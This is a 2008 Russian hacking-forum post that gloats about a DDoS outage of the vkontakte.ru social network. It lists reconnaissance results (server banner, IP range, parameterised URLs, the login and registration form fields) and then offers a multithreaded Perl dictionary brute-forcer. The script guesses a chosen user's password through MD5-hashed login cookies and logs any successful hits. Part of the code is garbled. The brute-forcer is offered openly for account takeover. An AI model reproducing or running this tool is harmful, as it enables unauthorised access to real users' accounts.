DDOS на сайт в vkontakte.ru подробнее >>> - Взлом развлекательных сайтов |
| Где то в районе 11 часов на сайт vkontakte.ru обрушилась ddos и сайт находится по сей час в дауне))) И так что мы имеем в 10 часов дня по Москве сайт перестал отвечать на запросы, почему? сейчас сайт выдает на ощибку http://vkontakte.ru/blank.php?code=10 Всего ошибок 39 можно поэксперементировать с параметрами. Многие говорят что идут технические работы, но обычно об этом предупреждают и тех работы идут ночью))) Напомним: социальная сеть, российский аналог сервиса Facebook, по данным Alexa.com первый по посещаемости сайт в России, третий в Белоруссии, Украине и Казахстане. Сайт изначально позиционировал себя как социальная сеть для студентов и выпускников российских высших учебных заведений. В настоящее время аудитория сайта представлена всеми слоями пользователей Интернета. Автором проекта является Павел Дуров. * 2006 год — 1 октября было зарегистрировано доменное имя vkontakte.ru обществом с ограниченной ответственностью «В Контакте». Данную дату принято считать датой основания сайта. * 2007 год: o 13 июля на сайте зарегистрировался миллионный участник. o 27 сентября по данным сервиса интенет-статистики Alexa.com сайт вошёл в тройку самых посещаемых сайтов России, оказавшись на третьем месте, уступая только веб-страницам поисковых систем Mail.ru и Яндексу. o 27 ноября сайт занял второе место в народном голосовании премии Рунета, уступив развлекательному веб-сайту bash.org.ru. * 2008 год: o 10 января по данным Alexa.com сайт стал лидером в России. но остаётся вторым в Рунет уступая только Mail.ru. o в конце февраля интерфейс сайта был переведён на украинский язык. o в начале марта число зарегистрированных участников превысило 9 миллионов. o 28 марта аудитория сайта превысила 10 миллионов участников. o 18 апреля зарегистрировался 11 миллионный участник. Сайт имеет несколько своих серверов и дато центров 195.190.105.0-195.190.105.255 Имя сервера : nginx/0.5.35 PHP/5.2.0-8+etch10 состояние : 200 (OK) текущие дата и время : Mon, 12 May 2008 08:58:32 GMT формат содержимого : text/html; charset=windows-1251 объем данных : 6815 соединение : close кэширование : private, must-revalidate Ссылка - http://vkontakte.ru/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 Содержание : информация о PHP (GET /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 HTTP/1.0) Список ссылок найденных на веб-сервере, которые используют какие-либо параметры: /help.php?page=demo2&step=1 /reg0/help.php?page=terms /reg0/help.php?page=about /reg0/js/simpleajax.js?2 /reg0/css/rustyle.css?2 /reg0/js/functions.js?5 /reg0/js/select.js?2 /help.php?page=terms /help.php?page=demo2 /login.php?op=forgot /help.php?page=about /reg0/css/help.css?3 /reg0/css/box.css?4 /js/simpleajax.js?2 /reg0/js/ajax.js?2 /css/rustyle.css?2 /js/functions.js?5 /reg0/js/box.js?4 /css/login.css?2 /css/help.css?2 Список форм использующихся для передачи данных на сервер: POST /login.php HTTP/1.1 email=&pass=&expire= POST /reg0/login.php HTTP/1.1 email=&pass=&expire= POST /reg0/profileEdit.php?page=education HTTP/1.1 subm=&time=&code=&mu=&first_name=&last_name=&email=&pass=&uni_city_other=&other_city_name= Если кому пригодится брутер на перле паролей) #!/usr/bin/perl use IO::Socket; use MD5; use threads; use threads::shared; my @pass : shared; ###################################### # C!klodoL # vkontakte.ru bruteforce with multi-threads ###################################### $dic = 'passl.txt'; #словарь паролей $id = 111111; #id цели $mail = 'mail@mail.com'; #мыло, вместо @ вписать @ $threads = 4; #количество потоков ###################################### open (pass, "<$dic"); Next: @pass = pass(); for(0..$threads) {$trl[$_] = threads->create(\&Brut, $_);} for(@trl) { $_->join; } sub Brut { while (@pass){ $pass = shift @pass; $md5 = MD5->hexhash($pass); $sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>'vkontakte.ru',PeerPort=>80); print $sock "HEAD http://vkontakte.ru/ HTTP/1.0\r\n". "Host: vkontakte.ru\r\n". "Accept: */*\r\n". "Content-Type: application/x-www-form-urlencoded\r\n". "User-Agent: Mozillo\r\n". "Cookie: remixchk=2; remixmid=$id; remixemail=$mail; remixpass=$md5\r\n". "Connection: close\r\n\r\n"; $answ = <$sock>; close $sock; print "$pass $answ"; if ($answ =~ /302/){ open (good, '>>good.txt'); print good "$id:$pass:$md5\n"; print "$id:$pass:$md5\n"; close good; exit;} } } goto Next; sub pass { my (@mas); while ( push @mas, $_; last if (@mas == 400); } chomp @mas; return @mas; } |
| Просмотров: 1333 | Добавлено: 12.05.2008 | Автор: shoff |
 |
Добавить комментарий
| Автор: Гость | 20.11.2008 |
 ничё не ясно. Можна как-то подробнее? |
| Автор: Гость | 18.11.2008 |
| поддерживаю ниже присутствующих людей!! |
| Автор: Гость | 18.11.2008 |
| мне тоже |
| Автор: Гость | 18.11.2008 |
| Текст лично мне ничего не дал. Хотя для многих он может оказаться реально полезным... :)
|